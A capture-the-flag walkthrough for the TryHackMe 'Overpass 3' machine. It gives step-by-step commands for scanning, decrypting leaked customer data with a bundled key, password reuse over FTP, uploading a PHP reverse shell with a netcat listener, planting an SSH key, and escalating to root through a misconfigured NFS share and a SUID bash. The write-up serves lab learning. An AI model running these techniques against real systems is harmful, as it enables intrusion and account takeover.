THM Machine: Overpass 3 - Hosting

PreviousTHM Machine: Overpass 2 - Hacked NextTHM Room: Pickle Rick CTF

Last updated 2 years ago

Was this helpful?

THM Machine: Overpass 3 - Hosting

Task 1 Overpass3 - Adventures in Hosting

Overview

After Overpass's rocky start in infosec and the commercial failure of their password manager and subsequent hack, they've decided to try a new business venture.

Overpass has become a web hosting company! Unfortunately, they haven't learned from their past mistakes. Rumor has it, their main web server is extremely vulnerable.

let's Start Hacking!

Information Gathering

Machine IP : 10.10.96.246

Scanning

Nmap Scanning Report

$ sudo nmap -sCV -A -p 21,22,80 10.10.96.246

Nmap scan report for 10.10.96.246
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
|   256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_  256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (94%), Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Unix

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   200.00 ms 10.8.0.1
2   200.00 ms 10.10.96.246

Total Open Ports: 3
Port Number: 21,22,80
Services: ftp,ssh,http
Services Versions: vsftpd 3.0.3, OpenSSH 8.0 (protocol 2.0), Apache httpd 2.4.37 ((centos))
Operating System: Linux(Centos)

Enumeration

Three services are running on the target system. So now we can enumerate the services. let's start doing it.

HTTP Enumeration

As Target has an http server running on the machine our first starting point is to look into the Target website so let's do it. Let's visit the website

Above is the main web page we can see there is nothing else just regular static pages containing some information about the overpass and nothing more.

As we could not find anything special on the site the next step is to start the Directory scanning for finding some hidden directories. Hidden Directories are those directories that are present o the site but we cannot see any of their references on the website.

ffuf Directory Scanning

$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://10.10.96.246/FUZZ -ic

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.96.246/FUZZ
 :: Wordlist         : FUZZ: directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 1770, Words: 443, Lines: 37]
backups                 [Status: 301, Size: 236, Words: 14, Lines: 8]
                        [Status: 200, Size: 1770, Words: 443, Lines: 37]
:: Progress: [87651/87651] :: Job [1/1] :: 209 req/sec :: Duration: [0:08:30] :: Errors: 9 ::

So we found one hidden directory name backups so we can visit it

We can only see one file there named backup.zip so let's download it and see what's in there

As we can see above there are two files in the backup.zip file.

priv.key
CustomerDetails.xlsx.gpg

When we use the file command on it we see the following output

And the other one is an encrypted file and as the name show that is about the overpass customers. As it is an encrypted file with the PGP cryptographic software so we cannot see the content of it without decrypting the file with a private key but luckily we have the Private Key.

So we have the private key, now let's decrypt the file and see its content. To decrypt that file we have to use a package name gnupg and we can install it using the following command.

Command: sudo apt install gnupg

When we install it then we have to use the command gpg. When we do that they will create a directory in our system. After that, we have to import the Private Key to our gpg directory and we can do this with the following command.

Command: gpg --import priv.key

This will add that private key and now we are able to decrypt the file with the following command

Command: gpg --decrypt CustomerDetails.xlsx.gpg > CustomerDetails.xlsx

This command decrypts the file and saves its content on the file CustomerDetails.xlsx in our present working directory. If everything goes fine then we can see the following files in our directory.

Now when I use the file command on the CustomerDetails.xlsx file they will show us the following file type

Now this will become an Excel file so we can open it in Excel and see its content.

Above is the content that is in the file where we can see the Customer Name, Username, Password and Credit Card Number with CVC numbers. But wait we see some of the names previously on the website main page Paradox and MuirlandOracle I wonder if username and password are also used in other services like ssh and ftp. After checking they are not used in ssh but they work for ftp service running on the server.

After successfully login to the ftp server using the paradox username and ShibesAreGreat123 as its password. we can use the ls command to see what is in there. We see this is the website's root directory there we can see the Backups directory index.html,main.css etc.

Now we are ready to upload the shell.php file to the target system. Connect to the target ftp server using the following command syntax

Syntax: ftp Target_IP_Here password: ShibesAreGreat123

When we are connected to the ftp server using the following command to upload the shell to the target web directory

ftp> put shell.php

This will upload the shell.php to the target system.

Note if your shell.php the file is in another directory then give him the full PATH of that file

Exploitation

Now we upload the shell.php file to the target system its time to get the connection but first start the listener on the system using the following command

$ nc -lvnp 4444

Where 4444 is the port number that is in the shell.php. When you start it then just go to the link in your browser or you can use the following command to activate the shell.php if the server accepts the php files then we get the connection back to us.

$ curl http://Tareget_IP/shell.php

And we indeed got the connection back to our listener. if you use the id command you will see you are login to the user apache. Use the cd command and press enter to go to its home directory there you will see the web flag. Now we should upgrade the shell

Shell Upgrade

Currently our shell is very bad if by any chance we press CTRL + C we will see our shell will close and also we cannot use any other command that changes the shell environment i.e you cannot use nano or su command because our current shell didn't have a better TTY. We can fix it using the following commands.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

After that press Ctrl+z to background the netcat shell and go to your system native shell and then use the following command

$ stty raw -echo

Now use the fg command to go back to the netcat reverse shell and hit Enter Key twice or use the reset command. Now you have a better TTY shell but if you have to upgrade that shell more so then again press Ctrl+z to background the nc terminal and then type the following command

$ echo $TERM

This command will show you some values like xterm-256color remember that value and then use the following command

$ stty size

This command will show you some numbers like 20 120 so in this, the first number shows the rows and the second show the column so note both the value and use the fg command to go back to your nc shell and type the following command

$ export TERM=xterm-256color

$ stty rows 30 columns 120

Once you did that you should get the netcat shell-like an ssh shell.

Privilege Escalation

So we have the ftp credentials for the paradox user so we can do local priv-escalation so use the following command to login into the paradox user

$ su paradox
password: ShibesAreGreat123

So when we use the ls -al command in the paradox user home directory there we see the following result

There is a directory name .ssh when we go there we see the following files there

There is only two file there one is authorized_keys and the other is id_rsa.pub so there is no ssh private key there so we can only connect to the ssh if we add our ssh public key in the authorized_keys file. To do that first, we have to create an ssh key pair in our system using the following command

$ ssh-keygen -f rsa

This will create an ssh key pair in the .ssh directory in the paradox user home directory. so use the cd ~/.ssh/ command to go to that directory and there you will see two files one name is id.rsa and the other is id.rsa.pub so use the cat id.rsa.pub command to see the content of that file and copy it. Now go to the netcat reverse shell and use the following command to edit the authorized_keys file

$ nano authorized_keys

And paste your public key there and now you can ssh to the target with the following command

$ ssh paradox@Target_IP

$ scp ./linpeas.sh paradox@Target_IP:/tmp

This command will copy linpeas.sh file in the target /tmp directory using the paradox ssh account so when we go there we can see the file.

So now we can run linpeas.sh to get the privilege escalation vectors but first, we have to make linpeas.sh in executable form using the following command

$ chmod +x linpeas.sh

And now we can run it using the following command.

$ ./linpeas.sh

As we can see from the linpeas.sh result there is no root privilege escalation vector found but there is an NFS service running as we can see from the linpeas result.

But we could not see any NFS service on the Nmap scan. That means the NFS service is only running in localhost which means we cannot access it remotely. Well, we can access it but first, we have to do port forwarding. Port forwarding is a thing in which we can forward the local port on the private network or system to the remote system. We can do port forwarding using ssh with the following command syntax.

syntax: ssh -L Localport:Local_IP:Remote_Port user@Target_IP

The NFS service is running by the user James and linpeas also gives us a link about Missed configuration that maybe use to do privilege escalation so we can visit it to learn about it also.

After doing research from the link given us by linpeas they tell us that if we mount that nfs share on the our attacker system then we can copy /bin/bash binary into the NFS share we mount on our attacking system and if we change its permissions with SUID bit set then if we see that binary on remote system we will see that binary have SUID` bit set there also and we can run that SUID bit set bash binary to do privilege escalation.

Now let's do that theory into action so first we have to mount that share into the our attacking system but first we have to forward that port into our system using ssh as we mentioned above. We can use the following command to do port forwarding using ssh

$ ssh -L 2049:127.0.0.1:2049 paradox@Target_IP

This command will forward the 2049 the port which is the NFS Port to our system 2049 Port. I use the command rpcinfo -p on the Target system to know about which port the target NFS server is running.

So now we can mount that share on our system using the following command

$ sudo mount -t nfs localhost:/ /mnt/nfs

if everything goes right we can successfully mount that share on our system. There we can get the user.txt flag and also when we use ls -al command there we can see there is a directory name .ssh that has James user ssh private key and we have read & write permission so we can read the ssh key using cat command and copy that key on our attacking system and change his permission using the command chmod 600 id.rsa so that only we can read it and now we can ssh to the James the user using its private key with the command ssh -i id.rsa james@Target_IP. We have ssh access to the James user now lets try to get the root user to do that follow the following steps

Using James user copy the /bin/bash binary to the home directory using the following command

$ cp /bin/bash /home/james

Now go to the mounting directory in your system where you mount the James NFS share directory.

$ cd /mnt/nfs

When you use the ls -al command there you see the bash binary but they have the normal permission there.

Now let try the theory to abuse the vulnerability that we discussed above we can change the permission to that file from our attacking system

$ chmod +s /mnt/nfs/bash

We can see from the James account that the binary got the SUID bit set, now we can get the root privileges with the following command

$ ./bash -p

So that how the nfs vulnerability work. linpeas.sh show us the link, we go there and learn about it and now using that we got the root privileges.